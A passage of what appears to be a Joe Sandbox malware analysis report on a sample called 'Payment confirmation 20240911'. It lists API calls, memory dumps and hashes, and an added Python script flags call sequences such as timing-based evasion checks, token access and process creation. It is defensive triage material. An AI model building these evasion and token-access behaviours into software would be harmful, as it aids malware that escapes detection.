                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A1D
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: e94d94f536ed305beb805a5ab224b7561ba0cafa0b481edc3ccde2fe8ae23fcc
                                          • Instruction ID: f795d94d348eaa839ebf968fe389294f37c185b3542f7d6a8a09f4b95bc8fd61
                                          • Opcode Fuzzy Hash: e94d94f536ed305beb805a5ab224b7561ba0cafa0b481edc3ccde2fe8ae23fcc
                                          • Instruction Fuzzy Hash: F3112771E0052DDBDF10AFE5DA89AEEBB78FF08715F014055EA82B2244CB709550CBA9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                          • Instruction ID: 02eede46d0fba5ec64e96961f58330e1174eb2cb5f3892b15f6382d8caaf8cb4
                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                          • Instruction Fuzzy Hash: A1014C7200014EBBCF1A5F88DC41CEE3F66BB5D358B488915FE1859034D336C6B2AB81
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0134DE07
                                          • ScreenToClient.USER32(?,?), ref: 0134DE1F
                                          • ScreenToClient.USER32(?,?), ref: 0134DE43
                                          • InvalidateRect.USER32(?,?,?), ref: 0134DE5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: de55d65809dda72885bb0990ad8eee58a5e18e40f722aebf54535c884ab8d0b1
                                          • Instruction ID: 5d6006779c38db2a7424b631489d4fd2319d20ed5472877d5070b5429c8b46fa
                                          • Opcode Fuzzy Hash: de55d65809dda72885bb0990ad8eee58a5e18e40f722aebf54535c884ab8d0b1
                                          • Instruction Fuzzy Hash: 66115DB9E00209EFDB11DFA9C4849EEBBF9FB08310F508166E965E3224D735AA54CF50
                                          APIs
                                          • __lock.LIBCMT ref: 01308768
                                            • Part of subcall function 01308984: __mtinitlocknum.LIBCMT ref: 01308996
                                            • Part of subcall function 01308984: EnterCriticalSection.KERNEL32(01300127,?,0130876D,0000000D), ref: 013089AF
                                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 01308775
                                          • __lock.LIBCMT ref: 01308789
                                          • ___addlocaleref.LIBCMT ref: 013087A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                          • String ID:
                                          • API String ID: 1687444384-0
                                          • Opcode ID: 2617806c37059cad1eea4f8a2d8bf1ca97a5fce3d44971d3be27e9468b8cbad7
                                          • Instruction ID: c3729147bb32c209a809f768bacab2f41f31693b35ab2430f88c1a74c431fbdf
                                          • Opcode Fuzzy Hash: 2617806c37059cad1eea4f8a2d8bf1ca97a5fce3d44971d3be27e9468b8cbad7
                                          • Instruction Fuzzy Hash: B4016D75801B02DFD722EF69C414759F7E0AF50729F20894ED0AA876E0DB70A644CB05
                                          APIs
                                          • _memset.LIBCMT ref: 0134E14D
                                          • _memset.LIBCMT ref: 0134E15C
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,013A3EE0,013A3F24), ref: 0134E18B
                                          • CloseHandle.KERNEL32 ref: 0134E19D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 050fdca55e31267dbd7ef8776a710c8c25f255200ff8fc6133e45be50405751b
                                          • Instruction ID: b358870fa01a9f55ce2113dd92ae28d670a1f05915605fc45a4c5d14bc810a98
                                          • Opcode Fuzzy Hash: 050fdca55e31267dbd7ef8776a710c8c25f255200ff8fc6133e45be50405751b
                                          • Instruction Fuzzy Hash: 85F082F2690301BFF2205BA5AC06FB7BAACFB09398F404420FB48D9195D3B69C0487A4
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 01329C7F
                                            • Part of subcall function 0132AD14: _memset.LIBCMT ref: 0132AD49
                                          • _memmove.LIBCMT ref: 01329CA2
                                          • _memset.LIBCMT ref: 01329CAF
                                          • LeaveCriticalSection.KERNEL32(?), ref: 01329CBF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: 43597dd9b5ee3659e383eb6e1fde15537c3d6924fb0127a690343db322ecf1de
                                          • Instruction ID: d7a2c7cbf7b300549dfcbaa01657f84af74e9e656592dbe399308a33dfe44748
                                          • Opcode Fuzzy Hash: 43597dd9b5ee3659e383eb6e1fde15537c3d6924fb0127a690343db322ecf1de
                                          • Instruction Fuzzy Hash: B2F05E7A200110ABCF016F98EC84A5AFB29EF55324F08C065FE089F21AC731E815DBF4
                                          APIs
                                            • Part of subcall function 012FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                            • Part of subcall function 012FB58B: BeginPath.GDI32(?), ref: 012FB611
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0134E860
                                          • LineTo.GDI32(00000000,?,?), ref: 0134E86D
                                          • EndPath.GDI32(00000000), ref: 0134E87D
                                          • StrokePath.GDI32(00000000), ref: 0134E88B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: b9b1a826e35c19922aaf9c7ad1e6abf240b9a8d47393b3f61404462431a20966
                                          • Instruction ID: ec88b2a44c9db2f791659ac03608c0680a97e35e459caac68432c73f71effdcd
                                          • Opcode Fuzzy Hash: b9b1a826e35c19922aaf9c7ad1e6abf240b9a8d47393b3f61404462431a20966
                                          • Instruction Fuzzy Hash: 12F05E31101259BBEB225F94AC0DFCA3F9DAF0A751F048111FB51250E587B99551CFA5
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0131D640
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0131D653
                                          • GetCurrentThreadId.KERNEL32(00000000), ref: 0131D65A
                                          • AttachThreadInput.USER32(00000000), ref: 0131D661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 83867a62c1f055ce55a8e776d1f7e2abd3f59d91a54f86bd347d7e7934c7567f
                                          • Instruction ID: add085c089efbfa6ecb11fe08e33886e1c3a3f726d0064cb7c571499373fbc6a
                                          • Opcode Fuzzy Hash: 83867a62c1f055ce55a8e776d1f7e2abd3f59d91a54f86bd347d7e7934c7567f
                                          • Instruction Fuzzy Hash: 4FE03931201228BAEB201FE29C0DEDB7F1CEF167B1F80C010F64C85064CBB59980CBA0
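The "APIs" listings above are the part of these function records an analyst actually triages: the QueryPerformanceCounter / Sleep / QueryPerformanceCounter loop (the timing check the report's "execution timing" signature refers to), gethostbyname followed by inet_ntoa, CreateProcessW with dwCreationFlags of 00000020, and GetWindowThreadProcessId followed by AttachThreadInput. The following parser and rule set is an added example for this page, not Joe Sandbox code: it reads "APIs" lines in the exact format shown in this report (including the "Part of subcall function" prefix and entries without an argument list), orders calls by their ref address, matches ordered subsequences of direct calls, and decodes the sixth CreateProcessW argument. The sample lines are copied from the function blocks on this page; the rule names, the CREATION_FLAGS table and the triage labels are this example's own assumptions, not report fields.

```python
"""Parse Joe Sandbox 'APIs' lines and flag call sequences worth a second look.

Added example for this report page, not Joe Sandbox code. Sample lines are
copied from the function listings on the page; rule names and the flag table
are this example's own.
"""
import re
from dataclasses import dataclass

# One 'APIs' entry: optional "Part of subcall function XXXX:" prefix,
# Name.MODULE, optional "(args)", then "ref: <hex call-site address>".
_API_RE = re.compile(
    r"^[•\-\*]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # raw argument tokens as printed; '?' means unresolved
    ref: int        # call-site address
    subcall: bool   # True when the report attributes it to a callee


def parse_api_lines(text):
    """Return ApiCall records in call-site (address) order; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line.strip())
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"].upper(), args,
                             int(m["ref"], 16), m["sub"] is not None))
    # Address order approximates program order inside one function.
    return sorted(calls, key=lambda c: c.ref)


# Ordered subsequences of *direct* calls (subcall entries are ignored).
# Labels are this example's assumption about why each sequence matters.
RULES = {
    "timing check (possible debugger/sandbox detection)":
        ["QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"],
    "hostname resolution": ["gethostbyname", "inet_ntoa"],
    "process creation": ["CreateProcessW"],
    "input attach to foreign window": ["GetWindowThreadProcessId", "AttachThreadInput"],
    "token access": ["OpenProcessToken"],
}


def _has_subsequence(names, pattern):
    it = iter(names)                      # 'p in it' consumes up to the match
    return all(p in it for p in pattern)


def classify(calls):
    direct = [c.api for c in calls if not c.subcall]
    return [label for label, pat in RULES.items() if _has_subsequence(direct, pat)]


# Subset of CreateProcess dwCreationFlags bits (values from the Win32 headers).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000020: "NORMAL_PRIORITY_CLASS",
    0x08000000: "CREATE_NO_WINDOW",
}


def creation_flags(calls):
    """Decode dwCreationFlags (6th argument) of each direct CreateProcessW call.

    Returns (ref, value, flag_names, suspended); a '?' argument is skipped
    because the sandbox could not resolve it.
    """
    out = []
    for c in calls:
        if c.api != "CreateProcessW" or c.subcall or len(c.args) < 6 or c.args[5] == "?":
            continue
        value = int(c.args[5], 16)
        names = [n for bit, n in CREATION_FLAGS.items() if value & bit]
        out.append((c.ref, value, names, bool(value & 0x4)))
    return out


# Constructed input: lines copied from the function listings on this page.
SAMPLE_TIMING = """\
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 013249EE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A13
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A1D
• Sleep.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A50
"""
SAMPLE_DNS = """\
  • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0132AEA5,?,?,00000000,00000008), ref: 012FF282
• gethostbyname.WSOCK32(?,?,?), ref: 013392F0
• WSAGetLastError.WSOCK32(00000000), ref: 013392FB
• _memmove.LIBCMT ref: 01339328
• inet_ntoa.WSOCK32(?), ref: 01339333
"""
SAMPLE_CREATE = """\
• _memset.LIBCMT ref: 0134E14D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,013A3EE0,013A3F24), ref: 0134E18B
• CloseHandle.KERNEL32 ref: 0134E19D
"""

if __name__ == "__main__":
    for name, text in (("timing", SAMPLE_TIMING), ("dns", SAMPLE_DNS), ("create", SAMPLE_CREATE)):
        calls = parse_api_lines(text)
        print(name, classify(calls), creation_flags(calls))
```

Because CREATE_SUSPENDED is not set in the CreateProcessW call at 0134E18B, this call site is not by itself the injection path that the report's "maps a DLL or memory area into another process" signature describes; the flag decode is what tells those two cases apart when reading a listing like this one.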
                                          APIs
                                          • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,0131B87A,?,?,?,0131B9C9), ref: 0131BE01
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0131B9C9), ref: 0131BE08
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0131B9C9), ref: 0131BE15
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0131B9C9), ref: 0131BE1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: e66dda217fba67ba9325d27fca0546ae1689e07b3cac8bc730b23b79f14fb75d
                                          • Instruction ID: 50b5a1c48adf7424e4a4a4a2901c2930c6f7ebf5130cfc986919496aecd6d6ca
                                          • Opcode Fuzzy Hash: e66dda217fba67ba9325d27fca0546ae1689e07b3cac8bc730b23b79f14fb75d
                                          • Instruction Fuzzy Hash: 1DE04F327412119BD7201EF5AC0CB967AACEF58796F11C818F2C5DA048D63480418770
                                          APIs
                                          • GetSysColor.USER32(00000008,00000000), ref: 012FB0C5
                                          • SetTextColor.GDI32(?,000000FF), ref: 012FB0CF
                                          • SetBkMode.GDI32(?,00000001), ref: 012FB0E4
                                          • GetStockObject.GDI32(00000005), ref: 012FB0EC
                                          • GetWindowDC.USER32(?), ref: 0135ECFA
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0135ED07
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0135ED20
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0135ED39
                                          • GetPixel.GDI32(00000000,?,?), ref: 0135ED59
                                          • ReleaseDC.USER32(?,00000000), ref: 0135ED64
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: c5d651ebd0a0c10a9cb7ed26f1ebaf3dd07b76afe8ad5310bb3b1154d4c05f76
                                          • Instruction ID: 6b427b8ba5b6b7ec786077e59624b27f05862ec332ca2d0db0c1d2cc2897fd76
                                          • Opcode Fuzzy Hash: c5d651ebd0a0c10a9cb7ed26f1ebaf3dd07b76afe8ad5310bb3b1154d4c05f76
                                          • Instruction Fuzzy Hash: 33E06531200240EEEF715FB8A809B887F159B05335F00C265FBA5580E6C3B18140DB11
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131C071
                                          • UnloadUserProfile.USERENV(?,?), ref: 0131C07D
                                          • CloseHandle.KERNEL32(?), ref: 0131C086
                                          • CloseHandle.KERNEL32(?), ref: 0131C08E
                                            • Part of subcall function 0131B850: GetProcessHeap.KERNEL32(00000000,?,0131B574), ref: 0131B857
                                            • Part of subcall function 0131B850: HeapFree.KERNEL32(00000000), ref: 0131B85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: eed81615044fe16ac6d6d2b3260e546bc06a83a01f93dd1f1dcd284532d4c237
                                          • Instruction ID: 62a4f40048f355e823646a9877a7e6325886145eebfa9d30e6031f808e424b51
                                          • Opcode Fuzzy Hash: eed81615044fe16ac6d6d2b3260e546bc06a83a01f93dd1f1dcd284532d4c237
                                          • Instruction Fuzzy Hash: B2E0B636204006FFCB512FE6ED08859FF7AFF993217108225F66581978CB72A831EB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 7f391b57947d9d3e2ec14f3464e2d599f6a612ac09fd122d4b4f1960c2a45d55
                                          • Instruction ID: acad0c87f86f097057b0d90bbdf51ba69adf25bb6a89b1d91f0a0fa8bc1f7297
                                          • Opcode Fuzzy Hash: 7f391b57947d9d3e2ec14f3464e2d599f6a612ac09fd122d4b4f1960c2a45d55
                                          • Instruction Fuzzy Hash: BBE04FB1600204EFDB205FB0D84CA697BADEB4C364F01C419FD8A87224DB74DC808B50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 0f33396bc6bc9566206e498775ac1809a09873e168de9a2ed6d726e1b2bb7757
                                          • Instruction ID: 9356c77b8b9061d134610d59da2a61796b4d8fd5d1d7d563556ea4dae31ca179
                                          • Opcode Fuzzy Hash: 0f33396bc6bc9566206e498775ac1809a09873e168de9a2ed6d726e1b2bb7757
                                          • Instruction Fuzzy Hash: 5DE04FB1600204EFDB105FB0D84C6697BA9EB4C360F01C419F98A87224DB7899408B50
                                          APIs
                                          • __getptd_noexit.LIBCMT ref: 01304C3E
                                            • Part of subcall function 013086B5: GetLastError.KERNEL32(?,01300127,013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 013086B7
                                            • Part of subcall function 013086B5: __calloc_crt.LIBCMT ref: 013086D8
                                            • Part of subcall function 013086B5: GetCurrentThreadId.KERNEL32(013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 01308701
                                            • Part of subcall function 013086B5: SetLastError.KERNEL32(00000000,01300127,013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 01308719
                                          • CloseHandle.KERNEL32(?), ref: 01304C52
                                          • __freeptd.LIBCMT ref: 01304C59
                                          • ExitThread.KERNEL32 ref: 01304C61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                          • String ID:
                                          • API String ID: 408300095-0
                                          • Opcode ID: 3d61fda31c346803a0164c5d8440a606fb9f65a17d38bee1aa46386dca63e827
                                          • Instruction ID: cae8c5215d6989033fb663e782810bdbdb994d5969b72f88332148265990d928
                                          • Opcode Fuzzy Hash: 3d61fda31c346803a0164c5d8440a606fb9f65a17d38bee1aa46386dca63e827
                                          • Instruction Fuzzy Hash: 80D02331801E529FD5333B6C8D1C60D36D45F01B3DF02C304D375050E0CF2085554791
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
